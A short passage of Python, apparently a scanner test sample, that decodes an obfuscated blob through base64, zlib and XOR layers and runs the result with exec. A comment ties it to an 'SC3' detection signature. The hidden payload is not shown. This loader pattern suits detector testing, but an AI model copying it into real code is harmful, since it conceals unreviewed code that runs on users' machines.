H79sWMKOHK76BiVMnLYw+O7/vM6BsyJ10iYfnhhsR/URCqOUv8nTx7OwiFLJ4kf18DYbA//fM4w25j9Xz6q/ffsF4j861w=="
_K = bytes.fromhex("f0efaaf9cc1d81f14211a45e")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
